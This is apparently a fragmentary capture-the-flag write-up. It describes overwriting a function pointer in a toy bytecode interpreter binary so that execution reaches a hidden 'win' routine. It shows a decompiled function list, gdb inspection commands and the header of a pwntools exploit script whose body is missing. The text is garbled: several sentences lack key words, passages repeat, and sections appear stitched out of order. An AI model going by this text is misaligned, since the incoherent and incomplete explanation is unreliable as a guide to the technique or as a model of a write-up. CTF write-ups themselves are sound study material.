There is to win from the interpreter – it is only reachable via a function pointer stored in the global variable callback . The pointer is used after the instruction loop finishes:
FUN_00401000 entry point (main) FUN_00401200 parse_input FUN_00401430 execute FUN_00401780 op_add FUN_00401810 op_sub FUN_004018c0 op_load FUN_00401950 op_store FUN_00401b10 win int main(void) char buf[256]; read(0, buf, 256); parse_input(buf); execute(); puts("Failure!"); return 0; isaimini.6
Thus, if we can , the program will call win after finishing the instruction stream, and we win. 5. Vulnerability Discovery The ST instruction performs: There is to win from the interpreter –
Success! If the real binary prints the flag, you will see it after Success! . (gdb) file isaimini.6 (gdb) set disassembly-flavor intel (gdb) break *0x00401430 # break at start of execute() (gdb) run (gdb) x/4gx $rsp # view saved RIP after HLT (gdb) x/gx 0x00603010 # examine callback after ST (gdb) continue You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10 . When the interpreter reaches the final if(callback) check, it jumps to that address and prints the success message. 8. Full Exploit Script (Python / pwntools) #!/usr/bin/env python3 from pwn import * (gdb) file isaimini
Putting it together (little‑endian encoding for the immediate):
# Send the payload via stdin printf "$payload" | ./isaimini.6 :